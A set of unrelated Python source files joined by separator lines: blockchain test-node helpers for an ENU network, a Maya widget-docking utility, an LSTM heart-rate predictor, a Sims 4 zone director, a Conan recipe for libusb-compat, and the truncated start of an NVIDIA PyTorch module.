if Utils.Debug: Utils.Print("cmd: %s" % (s))
trans=None
try:
trans=Utils.runCmdArrReturnJson(cmdArr)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during funds transfer. %s" % (msg))
return None
assert(trans)
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
@staticmethod
def currencyStrToInt(balanceStr):
"""Converts currency string of form "12.3456 ENU" to int 123456"""
assert(isinstance(balanceStr, str))
balanceStr=balanceStr.split()[0]
#balance=int(decimal.Decimal(balanceStr[1:])*10000)
balance=int(decimal.Decimal(balanceStr)*10000)
return balance
@staticmethod
def currencyIntToStr(balance, symbol):
"""Converts currency int of form 123456 to string "12.3456 ENU" where ENU is symbol string"""
assert(isinstance(balance, int))
assert(isinstance(symbol, str))
balanceStr="%.04f %s" % (balance/10000.0, symbol)
return balanceStr
def validateFunds(self, initialBalances, transferAmount, source, accounts):
"""Validate each account has the expected ENU balance. Validate cumulative balance matches expectedTotal."""
assert(source)
assert(isinstance(source, Account))
assert(accounts)
assert(isinstance(accounts, list))
assert(len(accounts) > 0)
assert(initialBalances)
assert(isinstance(initialBalances, dict))
assert(isinstance(transferAmount, int))
currentBalances=self.getEnuBalances([source] + accounts)
assert(currentBalances)
assert(isinstance(currentBalances, dict))
assert(len(initialBalances) == len(currentBalances))
if len(currentBalances) != len(initialBalances):
Utils.Print("ERROR: validateFunds> accounts length mismatch. Initial: %d, current: %d" % (len(initialBalances), len(currentBalances)))
return False
for key, value in currentBalances.items():
initialBalance = initialBalances[key]
assert(initialBalances)
expectedInitialBalance = value - transferAmount
if key is source:
expectedInitialBalance = value + (transferAmount*len(accounts))
if (initialBalance != expectedInitialBalance):
Utils.Print("ERROR: validateFunds> Expected: %d, actual: %d for account %s" %
(expectedInitialBalance, initialBalance, key.name))
return False
def getEnuBalances(self, accounts):
"""Returns a dictionary with account balances keyed by accounts"""
assert(accounts)
assert(isinstance(accounts, list))
balances={}
for account in accounts:
balance = self.getAccountEnuBalance(account.name)
balances[account]=balance
return balances
# Gets accounts mapped to key. Returns json object
def getAccountsByKey(self, key):
cmd="%s %s get accounts %s" % (Utils.EnuClientPath, self.endpointArgs, key)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during accounts by key retrieval. %s" % (msg))
return None
# Get actions mapped to an account (enucli get actions)
def getActions(self, account, pos=-1, offset=-1):
assert(isinstance(account, Account))
assert(isinstance(pos, int))
assert(isinstance(offset, int))
if not self.enableMongo:
cmd="%s %s get actions -j %s %d %d" % (Utils.EnuClientPath, self.endpointArgs, account.name, pos, offset)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
actions=Utils.runCmdReturnJson(cmd)
return actions
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during actions by account retrieval. %s" % (msg))
return None
else:
return self.getActionsMdb(account, pos, offset)
def getActionsMdb(self, account, pos=-1, offset=-1):
assert(isinstance(account, Account))
assert(isinstance(pos, int))
assert(isinstance(offset, int))
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand='db.actions.find({$or: [{"data.from":"%s"},{"data.to":"%s"}]}).sort({"_id":%d}).limit(%d)' % (account.name, account.name, pos, abs(offset))
if Utils.Debug: Utils.Print("cmd: echo '%s' | %s" % (subcommand, cmd))
try:
actions=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
if actions is not None:
return actions
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db actions. %s" % (msg))
return None
# Gets accounts mapped to key. Returns array
def getAccountsArrByKey(self, key):
trans=self.getAccountsByKey(key)
assert(trans)
assert("account_names" in trans)
accounts=trans["account_names"]
return accounts
def getServants(self, name):
cmd="%s %s get servants %s" % (Utils.EnuClientPath, self.endpointArgs, name)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during servants retrieval. %s" % (msg))
return None
def getServantsArr(self, name):
trans=self.getServants(name)
servants=trans["controlled_accounts"]
return servants
def getAccountEnuBalanceStr(self, scope):
"""Returns ENU currency0000 account balance from enucli get table command. Returned balance is string following syntax "98.0311 ENU". """
assert isinstance(scope, str)
amount=self.getTableAccountBalance("enu.token", scope)
if Utils.Debug: Utils.Print("getNodeAccountEnuBalance %s %s" % (scope, amount))
assert isinstance(amount, str)
return amount
def getAccountEnuBalance(self, scope):
"""Returns ENU currency0000 account balance from enucli get table command. Returned balance is an integer e.g. 980311. """
balanceStr=self.getAccountEnuBalanceStr(scope)
balance=Node.currencyStrToInt(balanceStr)
return balance
def getAccountCodeHash(self, account):
cmd="%s %s get code %s" % (Utils.EnuClientPath, self.endpointArgs, account)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
retStr=Utils.checkOutput(cmd.split())
#Utils.Print ("get code> %s"% retStr)
p=re.compile(r'code\shash: (\w+)\n', re.MULTILINE)
m=p.search(retStr)
if m is None:
msg="Failed to parse code hash."
Utils.Print("ERROR: "+ msg)
return None
return m.group(1)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during code hash retrieval. %s" % (msg))
return None
# publish contract and return transaction as json object
def publishContract(self, account, contractDir, wastFile, abiFile, waitForTransBlock=False, shouldFail=False):
cmd="%s %s -v set contract -j %s %s" % (Utils.EnuClientPath, self.endpointArgs, account, contractDir)
cmd += "" if wastFile is None else (" "+ wastFile)
cmd += "" if abiFile is None else (" " + abiFile)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd, trace=False)
except subprocess.CalledProcessError as ex:
if not shouldFail:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during code hash retrieval. %s" % (msg))
return None
else:
retMap={}
retMap["returncode"]=ex.returncode
retMap["cmd"]=ex.cmd
retMap["output"]=ex.output
# commented below as they are available only in Python3.5 and above
# retMap["stdout"]=ex.stdout
# retMap["stderr"]=ex.stderr
return retMap
if shouldFail:
Utils.Print("ERROR: The publish contract did not fail as expected.")
return None
Node.validateTransaction(trans)
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getTableRows(self, contract, scope, table):
jsonData=self.getTable(contract, scope, table)
if jsonData is None:
return None
rows=jsonData["rows"]
return rows
def getTableRow(self, contract, scope, table, idx):
if idx < 0:
Utils.Print("ERROR: Table index cannot be negative. idx: %d" % (idx))
return None
rows=self.getTableRows(contract, scope, table)
if rows is None or idx >= len(rows):
Utils.Print("ERROR: Retrieved table does not contain row %d" % idx)
return None
row=rows[idx]
return row
def getTableColumns(self, contract, scope, table):
row=self.getTableRow(contract, scope, table, 0)
keys=list(row.keys())
return keys
# returns tuple with transaction and
def pushMessage(self, account, action, data, opts, silentErrors=False):
cmd="%s %s push action -j %s %s" % (Utils.EnuClientPath, self.endpointArgs, account, action)
cmdArr=cmd.split()
if data is not None:
cmdArr.append(data)
if opts is not None:
cmdArr += opts.split()
s=" ".join(cmdArr)
if Utils.Debug: Utils.Print("cmd: %s" % (s))
try:
trans=Utils.runCmdArrReturnJson(cmdArr)
return (True, trans)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
if not silentErrors:
Utils.Print("ERROR: Exception during push message. %s" % (msg))
return (False, msg)
def setPermission(self, account, code, pType, requirement, waitForTransBlock=False):
cmd="%s %s set action permission -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, account, code, pType, requirement)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during set permission. %s" % (msg))
return None
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def delegatebw(self, fromAccount, netQuantity, cpuQuantity, toAccount=None, transferTo=False, waitForTransBlock=False):
if toAccount is None:
toAccount=fromAccount
specificCmd="system delegatebw"
transferStr="--transfer" if transferTo else ""
cmd="%s %s %s -j %s %s \"%s %s\" \"%s %s\" %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, fromAccount.name, toAccount.name, netQuantity, CORE_SYMBOL, cpuQuantity, CORE_SYMBOL, transferStr)
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def regproducer(self, producer, url, location, waitForTransBlock=False):
specificCmd="system regproducer"
cmd="%s %s %s -j %s %s %s %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, producer.name, producer.activePublicKey, url, location)
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def vote(self, account, producers, waitForTransBlock=False):
specificCmd = "system voteproducer prods"
cmd="%s %s %s -j %s %s" % (
Utils.EnuClientPath, self.endpointArgs, specificCmd, account.name, " ".join(producers))
return self.processCmd(cmd, specificCmd, waitForTransBlock)
def processCmd(self, cmd, cmdDesc, waitForTransBlock):
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
trans=None
try:
trans=Utils.runCmdReturnJson(cmd)
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during %s. %s" % (cmdDesc, msg))
return None
transId=Node.getTransId(trans)
if waitForTransBlock and not self.waitForTransInBlock(transId):
return None
return trans
def getInfo(self, silentErrors=False):
cmd="%s %s get info" % (Utils.EnuClientPath, self.endpointArgs)
if Utils.Debug: Utils.Print("cmd: %s" % (cmd))
try:
trans=Utils.runCmdReturnJson(cmd, silentErrors=silentErrors)
return trans
except subprocess.CalledProcessError as ex:
if not silentErrors:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get info. %s" % (msg))
return None
def getBlockFromDb(self, idx):
cmd="%s %s" % (Utils.MongoPath, self.mongoEndpointArgs)
subcommand="db.blocks.find().sort({\"_id\":%d}).limit(1).pretty()" % (idx)
if Utils.Debug: Utils.Print("cmd: echo \"%s\" | %s" % (subcommand, cmd))
try:
trans=Node.runMongoCmdReturnJson(cmd.split(), subcommand)
return trans
except subprocess.CalledProcessError as ex:
msg=ex.output.decode("utf-8")
Utils.Print("ERROR: Exception during get db block. %s" % (msg))
return None
def checkPulse(self):
info=self.getInfo(True)
return False if info is None else True
def getHeadBlockNum(self):
"""returns head block number(string) as returned by enucli get info."""
if not self.enableMongo:
info=self.getInfo()
if info is not None:
headBlockNumTag="head_block_num"
return info[headBlockNumTag]
else:
# Either this implementation or the one in getIrreversibleBlockNum are likely wrong.
block=self.getBlockFromDb(-1)
if block is not None:
blockNum=block["block_num"]
return blockNum
return None
def getIrreversibleBlockNum(self):
if not self.enableMongo:
info=self.getInfo()
if info is not None:
return info["last_irreversible_block_num"]
else:
# Either this implementation or the one in getHeadBlockNum are likely wrong.
block=self.getBlockFromDb(-1)
if block is not None:
blockNum=block["block_num"]
return blockNum
return None
def kill(self, killSignal):
if Utils.Debug: Utils.Print("Killing node: %s" % (self.cmd))
assert(self.pid is not None)
try:
os.kill(self.pid, killSignal)
except OSError as ex:
Utils.Print("ERROR: Failed to kill node (%d)." % (self.cmd), ex)
return False
# wait for kill validation
def myFunc():
try:
os.kill(self.pid, 0) #check if process with pid is running
except OSError as _:
return True
return False
if not Utils.waitForBool(myFunc):
Utils.Print("ERROR: Failed to validate node shutdown.")
return False
# mark node as killed
self.pid=None
self.killed=True
return True
# TBD: make nodeId an internal property
# pylint: disable=too-many-locals
def relaunch(self, nodeId, chainArg, newChain=False, timeout=Utils.systemWaitTimeout):
assert(self.pid is None)
assert(self.killed)
if Utils.Debug: Utils.Print("Launching node process, Id: %d" % (nodeId))
cmdArr=[]
myCmd=self.cmd
if not newChain:
skip=False
for i in self.cmd.split():
Utils.Print("\"%s\"" % (i))
if skip:
skip=False
continue
if "--genesis-json" == i or "--genesis-timestamp" == i:
skip=True
continue
cmdArr.append(i)
myCmd=" ".join(cmdArr)
dataDir="var/lib/node_%02d" % (nodeId)
dt = datetime.datetime.now()
dateStr="%d_%02d_%02d_%02d_%02d_%02d" % (
dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second)
stdoutFile="%s/stdout.%s.txt" % (dataDir, dateStr)
stderrFile="%s/stderr.%s.txt" % (dataDir, dateStr)
with open(stdoutFile, 'w') as sout, open(stderrFile, 'w') as serr:
#cmd=self.cmd + ("" if chainArg is None else (" " + chainArg))
cmd=myCmd + ("" if chainArg is None else (" " + chainArg))
Utils.Print("cmd: %s" % (cmd))
popen=subprocess.Popen(cmd.split(), stdout=sout, stderr=serr)
self.pid=popen.pid
def isNodeAlive():
"""wait for node to be responsive."""
try:
return True if self.checkPulse() else False
except (TypeError) as _:
pass
return False
isAlive=Utils.waitForBool(isNodeAlive, timeout)
if isAlive:
Utils.Print("Node relaunch was successfull.")
else:
Utils.Print("ERROR: Node relaunch Failed.")
self.pid=None
return False
self.killed=False
return True
|
"""Make any window dockable within Maya.
:created: 8 Jun 2018
:author: Benoit Gielly <benoit.gielly@gmail.com>
"""
from PySide2.QtCore import QObject
from maya import cmds, mel
from . import utils
def dock_widget(widget, label="DockWindow", area="right", floating=False):
"""Dock the given widget properly for both M2016 and 2017+."""
# convert widget to Qt if needed
if not issubclass(widget.__class__, QObject):
widget = utils.to_qwidget(widget)
# make sure our widget has a name
name = widget.objectName()
if not name:
name, num = label + "_mainWindow", 1
while cmds.control(name, exists=True):
name = label + "_mainWindow" + str(num)
num += 1
widget.setObjectName(label + "_mainWindow")
# if `floating` is True, return with `widget.show()`
if floating is True:
if not widget.windowTitle():
widget.setWindowTitle(label)
widget.show()
return widget
# make sure the workspaceControl doesn't exist yet
control = name + "_WorkspaceControl"
if cmds.control(control, exists=True):
cmds.deleteUI(control)
# create workspaceControl (only works with Maya 2017+)
flags = {"dockToControl": ["ToolBox", "right"]}
if area == "right":
# If the ChannelBox is not visible, fallback on the AttributeEditor.
_control = "ChannelBoxLayerEditor"
if not cmds.workspaceControl(_control, query=True, visible=True):
_control = "AttributeEditor"
flags = {"tabToControl": [_control, -1]}
control = cmds.workspaceControl(control)
cmds.workspaceControl(control, edit=True, label=label, r=True, **flags)
# Convert workspace to Qt and add the widget into its layout.
workspace = utils.to_qwidget(control)
layout = workspace.layout()
layout.addWidget(widget)
return widget
def get_available_controls():
"""Return all the available Controls in list.
Returns:
list: List of existing workspaceControls.
"""
if not hasattr(cmds, "workspaceControl"):
return []
tools = mel.eval("$ctrl_tmp_var = $gUIComponentToolBarArray;")
docks = mel.eval("$ctrl_tmp_var = $gUIComponentDockControlArray;")
controls = sorted(
{x for x in tools + docks if cmds.workspaceControl(x, exists=True)}
)
return controls
|
# load and plot dataset
import numpy
#import matplotlib.pyplot as plt
import matplotlib.axes as axes
import pandas
import math
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from sklearn.preprocessing import MinMaxScaler
from sklearn.metrics import mean_squared_error
import pylab
from matplotlib.pyplot import show
from matplotlib import pyplot as plt
from matplotlib.animation import FuncAnimation
from matplotlib.figure import Figure
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import Tkinter
look_back = 200
class PulsePre:
def __init__(self,root):
self.plt=plt
self.plt.subplots_adjust(left=0.5, bottom=0.8, right=0.9, top=0.9, wspace=0.9, hspace=0.9)
self.plt.ion()
self.model=[]
self.oripredict=[]
self.oriplot=[]
self.x1=0
self.t1,self.t2,self.t3,self.v,self.v2,self.v3=[],[],[],[],[],[]
#self.plt.subplots_adjust(left=0.125, bottom=0.1, right=0.9, top=0.9, wspace=0.2, hspace=0.2)
frame = Tkinter.Frame(root)
self.fig = Figure()
#self.fig.canvas.set_window_title('Predicted Heart Rate vs Real time Heart Rate')
self.ax1 = self.fig.add_subplot(221)
self.ax1.set_title("Predicted Heart Rate")
self.ax2 = self.fig.add_subplot(222)
self.ax2.set_title("Real time Heart Rate")
self.ax3 = self.fig.add_subplot(223)
self.ax3.set_title("Difference between Heart Rate")
self.ax3.set_position([0.1,0.05, 0.5, 0.35])
#self.ax3.subplots_adjust(left=0.5, bottom=0.8, right=0.9, top=0.9, wspace=0.9, hspace=0.9)
self.line, = self.ax1.plot(self.t2,self.v, linestyle="-", color="r")
self.lineone, = self.ax2.plot(self.t1,self.v2, linestyle="-", color="r")
self.linetwo, = self.ax3.plot(self.t2,self.v3, linestyle="-", color="r")
self.canvas = FigureCanvasTkAgg(self.fig,master=root)
self.canvas.show()
self.canvas.get_tk_widget().pack(side='top', fill='both', expand=1)
frame.pack()
self.score=0
def floatconv(self,pulse):
for i in pulse:
if i !='':
float(i)
else:
del i
return pulse
def create_dataset(self,dataset, look_back):
dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return numpy.array(dataX), numpy.array(dataY)
def rewrite(self):
fo = open('pulse.txt','r')
n = open('pulse.txt', 'a')
pulse=fo.read().split(' ')
rm=open('pulse.txt', 'w').close()
del pulse[-1],pulse[0:999]
for i in pulse:
n.write(i+' ')
def updateData(self,num):
#del firstdata
fo = open('pulse.txt','r')
pulse=fo.read().split(' ')
num=-num-200
del pulse[-1],pulse[0:num]
pulse=self.floatconv(pulse)
pulselast=pulse[-1]
#print 'lat: ',pulselast
#time=[]
a=0
'''for i in pulse:
time.append(round(a,1))
a+=0.3'''
pulse=numpy.array(pulse)
pulse= numpy.reshape(pulse, (-1, 1))
scaler = MinMaxScaler(feature_range=(0, 1))
dataset = scaler.fit_transform(pulse)
# split into train and test sets
train_size = int(len(dataset) * 0.67)
test_size = len(dataset) - train_size
train, test = dataset[0:train_size,:], dataset[train_size:len(dataset),:]
# reshape into X=t and Y=t+1
#look_back = 200#predict for future 1 minute
trainX, trainY = self.create_dataset(train, look_back)
testX, testY = self.create_dataset(test, look_back)
datasetX, datasetY = self.create_dataset(dataset, look_back)
oritestX=datasetX
trainX = numpy.reshape(trainX, (trainX.shape[0], 1, trainX.shape[1]))
testX = numpy.reshape(testX, (testX.shape[0], 1, testX.shape[1]))
return trainX,trainY,testX,testY,oritestX,scaler,pulselast
def trainmodel(self,trainX,trainY,testX,testY,scaler):
# create and fit the LSTM network
model = Sequential()
model.add(LSTM(4, input_shape=(1, look_back)))
model.add(Dense(1))
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(trainX, trainY, epochs=1, batch_size=1, verbose=2)
# make predictions
trainPredict = model.predict(trainX)
testPredict = model.predict(testX)
#scaler = MinMaxScaler(feature_range=(0, 1))
# invert predictions
trainPredict = scaler.inverse_transform(trainPredict)
trainY = scaler.inverse_transform([trainY])
testPredict = scaler.inverse_transform(testPredict)
testY = scaler.inverse_transform([testY])
# calculate root mean squared error
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
#print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
#print('Test Score: %.2f RMSE' % (testScore))
return model
def predictapp(self,num,oritestX,model,scaler):
futureX=oritestX
futureX = numpy.reshape(futureX, (futureX.shape[0], 1, futureX.shape[1]))
#print futureX
futurePredict=model.predict(futureX)
futurePredict=scaler.inverse_transform(futurePredict)
futurePredict=futurePredict.ravel()
return futurePredict
def p(self,a, b,oritestX,pulselast):
self.t1.append(a)
self.t2.append(a+1)
self.v.append(b)#predicted
self.v2.append(numpy.array(float(pulselast)))#realtime
#print 'v ',self.v
#print 'v2 ',self.v2
if a>=0.995:
self.t3.append(a)
print self.v[-200]
self.v3.append(abs(float(pulselast)-self.v[-200]))#difference
self.ax3.set_xlim(min(self.t3), max(self.t3) + 1)
self.linetwo.set_data(self.t3, self.v3)
self.ax3.set_ylim(0,20)
self.ax1.set_xlim(min(self.t2), max(self.t2) + 1)
self.ax1.set_ylim(0, 100)
self.ax2.set_xlim(min(self.t1), max(self.t1) + 1)
self.ax2.set_ylim(0,100)
self.line.set_data(self.t2, self.v)
#self.plt.pause(0.001)
#self.ax1.figure.canvas.draw()
self.lineone.set_data(self.t1, self.v2)
self.canvas.draw()
#self.ax2.figure.canvas.draw()
# shift train predictions for plotting
def accuracy(self):
self.score = math.sqrt(mean_squared_error(self.v, self.v2))
return self.score
def plotpulse(self,num):
trainX,trainY,testX,testY,oritestX,scaler,pulselast=self.updateData(num)
if num==-201:
self.model.append(self.trainmodel(trainX,trainY,testX,testY,scaler))
if (num+201)%(-100)==0 and num!=-201: #update accurary every 30s
score=self.accuracy()
futurePredict=self.predictapp(num,oritestX[-200:],self.model[0],scaler)
self.p(self.x1,futurePredict[-1],oritestX,pulselast)
self.x1=self.x1+0.005
return self.score
|
from careers.career_event_zone_director import CareerEventZoneDirector
import sims4.log
logger = sims4.log.Logger('Crime Scene', default_owner='bhill')
class CrimeSceneZoneDirector(CareerEventZoneDirector):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._should_load_sims = False
def _load_custom_zone_director(self, zone_director_proto, reader):
self._should_load_sims = True
super()._load_custom_zone_director(zone_director_proto, reader)
def _on_maintain_zone_saved_sim(self, sim_info):
if self._should_load_sims:
super()._on_maintain_zone_saved_sim(sim_info)
else:
logger.info('Discarding saved sim: {}', sim_info)
def _process_injected_sim(self, sim_info):
logger.info('Discarding injected sim: {}', sim_info)
|
from conans import ConanFile, AutoToolsBuildEnvironment, CMake, tools
from conans.errors import ConanException
from contextlib import contextmanager
import os
import re
import shlex
import shutil
required_conan_version = ">=1.33.0"
class LibUSBCompatConan(ConanFile):
name = "libusb-compat"
description = "A compatibility layer allowing applications written for libusb-0.1 to work with libusb-1.0"
license = ("LGPL-2.1", "BSD-3-Clause")
homepage = "https://github.com/libusb/libusb-compat-0.1"
url = "https://github.com/conan-io/conan-center-index"
exports_sources = "patches/**", "CMakeLists.txt.in"
topics = ("conan", "libusb", "compatibility", "usb")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"enable_logging": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"enable_logging": False,
}
generators = "cmake", "pkg_config"
_autotools = None
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
del self.settings.compiler.libcxx
del self.settings.compiler.cppstd
def requirements(self):
self.requires("libusb/1.0.24")
if self.settings.compiler == "Visual Studio":
self.requires("dirent/1.23.2")
@property
def _settings_build(self):
return self.settings_build if hasattr(self, "settings_build") else self.settings
def build_requirements(self):
self.build_requires("gnu-config/cci.20201022")
self.build_requires("libtool/2.4.6")
self.build_requires("pkgconf/1.7.4")
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _iterate_lib_paths_win(self, lib):
"""Return all possible library paths for lib"""
for lib_path in self.deps_cpp_info.lib_paths:
for prefix in "", "lib":
for suffix in "", ".a", ".dll.a", ".lib", ".dll.lib":
fn = os.path.join(lib_path, "{}{}{}".format(prefix, lib, suffix))
if not fn.endswith(".a") and not fn.endswith(".lib"):
continue
yield fn
@property
def _absolute_dep_libs_win(self):
absolute_libs = []
for lib in self.deps_cpp_info.libs:
for fn in self._iterate_lib_paths_win(lib):
if not os.path.isfile(fn):
continue
absolute_libs.append(fn)
break
return absolute_libs
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.configure(source_dir=os.path.join(self._source_subfolder, "libusb"))
return self._cmake
def _configure_autotools(self):
if self._autotools:
return self._autotools
self._autotools = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)
if self.settings.compiler == "Visual Studio":
# Use absolute paths of the libraries instead of the library names only.
# Otherwise, the configure script will say that the compiler not working
# (because it interprets the libs as input source files)
self._autotools.libs = list(tools.unix_path(l) for l in self._absolute_dep_libs_win) + self.deps_cpp_info.system_libs
conf_args = [
"--disable-examples-build",
"--enable-log" if self.options.enable_logging else "--disable-log",
]
if self.options.shared:
conf_args.extend(["--enable-shared", "--disable-static"])
else:
conf_args.extend(["--disable-shared", "--enable-static"])
pkg_config_paths = [tools.unix_path(os.path.abspath(self.install_folder))]
self._autotools.configure(args=conf_args, configure_dir=self._source_subfolder, pkg_config_paths=pkg_config_paths)
return self._autotools
@contextmanager
def _build_context(self):
if self.settings.compiler == "Visual Studio":
with tools.vcvars(self.settings):
env = {
"CC": "{} cl -nologo".format(tools.unix_path(self.deps_user_info["automake"].compile)),
"CXX": "{} cl -nologo".format(tools.unix_path(self.deps_user_info["automake"].compile)),
"LD": "link -nologo",
"AR": "{} lib".format(tools.unix_path(self.deps_user_info["automake"].ar_lib)),
"DLLTOOL": ":",
"OBJDUMP": ":",
"RANLIB": ":",
"STRIP": ":",
}
with tools.environment_append(env):
yield
else:
yield
def _extract_makefile_variable(self, makefile, variable):
makefile_contents = tools.load(makefile)
match = re.search("{}[ \t]*=[ \t]*((?:(?:[a-zA-Z0-9 \t.=/_-])|(?:\\\\\"))*(?:\\\\\n(?:(?:[a-zA-Z0-9 \t.=/_-])|(?:\\\"))*)*)\n".format(variable), makefile_contents)
if not match:
raise ConanException("Cannot extract variable {} from {}".format(variable, makefile_contents))
lines = [line.strip(" \t\\") for line in match.group(1).split()]
return [item for line in lines for item in shlex.split(line) if item]
def _extract_autotools_variables(self):
makefile = os.path.join(self._source_subfolder, "libusb", "Makefile.am")
sources = self._extract_makefile_variable(makefile, "libusb_la_SOURCES")
headers = self._extract_makefile_variable(makefile, "include_HEADERS")
return sources, headers
def _patch_sources(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
shutil.copy(self._user_info_build["gnu-config"].CONFIG_SUB,
os.path.join(self._source_subfolder, "config.sub"))
shutil.copy(self._user_info_build["gnu-config"].CONFIG_GUESS,
os.path.join(self._source_subfolder, "config.guess"))
if self.settings.os == "Windows":
api = "__declspec(dllexport)" if self.options.shared else ""
tools.replace_in_file(os.path.join(self._source_subfolder, "configure.ac"),
"\nAC_DEFINE([API_EXPORTED]",
"\nAC_DEFINE([API_EXPORTED], [{}], [API])\n#".format(api))
# libtool disallows building shared libraries that link to static libraries
# This will override this and add the dependency
tools.replace_in_file(os.path.join(self._source_subfolder, "ltmain.sh"),
"droppeddeps=yes", "droppeddeps=no && func_append newdeplibs \" $a_deplib\"")
@property
def _user_info_build(self):
return getattr(self, "user_info_build", None) or self.deps_user_info
def build(self):
self._patch_sources()
with self._build_context():
autotools = self._configure_autotools()
if self.settings.os == "Windows":
cmakelists_in = tools.load("CMakeLists.txt.in")
sources, headers = self._extract_autotools_variables()
tools.save(os.path.join(self._source_subfolder, "libusb", "CMakeLists.txt"), cmakelists_in.format(
libusb_sources=" ".join(sources),
libusb_headers=" ".join(headers),
))
tools.replace_in_file("config.h", "\n#define API_EXPORTED", "\n#define API_EXPORTED //")
cmake = self._configure_cmake()
cmake.build()
else:
with self._build_context():
autotools.make()
def package(self):
self.copy("LICENSE", src=self._source_subfolder, dst="licenses")
if self.settings.os == "Windows":
cmake = self._configure_cmake()
cmake.install()
else:
with self._build_context():
autotools = self._configure_autotools()
autotools.install()
os.unlink(os.path.join(self.package_folder, "bin", "libusb-config"))
os.unlink(os.path.join(self.package_folder, "lib", "libusb.la"))
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
def package_info(self):
self.cpp_info.names["pkg_config"] = "libusb"
self.cpp_info.libs = ["usb"]
if not self.options.shared:
self.cpp_info.defines = ["LIBUSB_COMPAT_STATIC"]
|
# *****************************************************************************
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the NVIDIA CORPORATION nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# *****************************************************************************
import copy
import torch
from torch.autograd import Variable
import torch.nn.functional as F
@torch.jit.script
def fused_add_tanh_sigmoid_multiply(input_a, input_b, n_channels):
n_channels_int = n_channels[0]
in_act = input_a+input_b
